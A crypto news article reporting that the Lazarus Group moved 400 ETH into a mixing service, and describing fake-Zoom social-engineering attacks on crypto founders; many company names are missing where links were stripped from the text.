Lazarus Group Deposits 400 ETH to Tornado Cash, Hackers Target Crypto Vets on Zoom
The notorious North Korean hackers known as thecontinues moving the crypto funds they’ve stolen in recent exploits. And now, the alleged North Korean hackers target crypto execs via.
Blockchain security firmposted on 13 March that this group had deposited 400 ETH to the popularmixing service. This amount is currently worth $759,444.
And there is no sign of the group stopping their activities. “Stay vigilant,” the post warns.
#CertiKInsight
We have detected deposit of 400 ETH in https://t.co/0lwPdz0OWi on Ethereum from:
0xdB31a812261d599A3fAe74Ac44b1A2d4e5d00901
0xB23D61CeE73b455536EF8F8f8A5BadDf8D5af848.
The fund traces to the Lazarus group’s activity on the Bitcoin network.
Stay Vigilant! pic.twitter.com/IHwFwt5uQs
Lazarus is the infamous group of hackers connected to some of the crypto’s most high-profile attacks. These include thenetwork hack, which saw the loss of $624 million in 2022.
And just recently, in February, the group stole $1.4 billion in crypto from theexchange hack.
The crypto space has been carefully observing the movement of all these funds, given that the attackers aim to launder it all.
Worryingly, cybersecurity experts have warned that Lazarus has been deploying a novel, sophisticated, and constantly evolving crypto stealing malware aiming at crypto developers.
More specifically, for months now, North Korea has been targeting developers via NPM supply chain attacks. The goal is to steal funds and data.
Additionally, the malware seeks to infiltrate popular cryptocurrency wallets. Various reports have named,, andas popular targets.
You might also like Lazarus Targets Solana and Exodus Wallets, Infecting Hundreds of Software DevelopersNorth Korean Hackers Target Crypto Founders via Zoom
Recently, there has been a different kind of threat looming, targeting crypto company founders.
Hackers are working to steal data and funds through a fake Zoom call. They typically set up a business meeting and once on the call, they pretend they’re experiencing issues.
They post “a stock video of a bored” venture capitalist on the screen, and ask the target to click a LINK to a fake new call they sent. But it’s malware.
All this is according to Nick Bax of the. He said the threat group stole “$10s of millions of dollars” using this tactic, and others are copying it
Having audio issues on your Zoom call? That’s not a VC, it’s North Korean hackers.
Fortunately, this founder realized what was going on.
The call starts with a few "VCs" on the call. They send messages in the chat saying they can’t hear your audio, or suggesting there’s an… pic.twitter.com/ZnW8Mtof4F
Meanwhile, the hackers are currently presumed to be North Korean, but this is unverified.
Groups linked to North Korea “have become notorious for their sophisticated and relentless tradecraft,” according to a Chainalysis report. In 2024, they stole $1.34 billion across 47 incidents – 61% of the total amount stolen for the year, and 20% of total incidents.
That said, Giulio Xiloyannis, the CEO ofand cofounder of, shared his own recent experience. He also received a Zoom link that makes people install malware.
Great example of the North Korean Zoom audio hacking method.
The commands in the screenshot are harmless but when you click the copy button, it adds an additional curl command that downloads/runs a malicious file.https://t.co/Mhd46KhTKq
Luckily, Xiloyannis noticed red flags, and the hackers failed. “There were tellsigns,” he said. “Opens browser Zoom without asking to use the App, asking me to paste code on my “terminal”.”
Moreover, Melbin Thomas, founder of, David Zhang, cofounder of, Christoph Mussenbrock, cofounder of blockchain platform, and several other people reported similar attempted hacks.
Another day another North Korean scammer
This time using the same "fake Zoom" scam that’s been popular recently
I’ll detail what happened to me in this
pic.twitter.com/X5UZAKJjR0
This is unlikely to stop. Chainalysis noted that North Korean hackers employ advanced malware, social engineering, and cryptocurrency theft to fund state-sponsored operations and circumvent international sanctions.
Additionally, Tom Robinson, co-founder of crypto investigation firm, warned that North Korea is the most advanced player when it comes to laundering stolen digital assets.
You might also like North Korean Hackers Already Laundered $300M from Record $1.5B Bybit Heist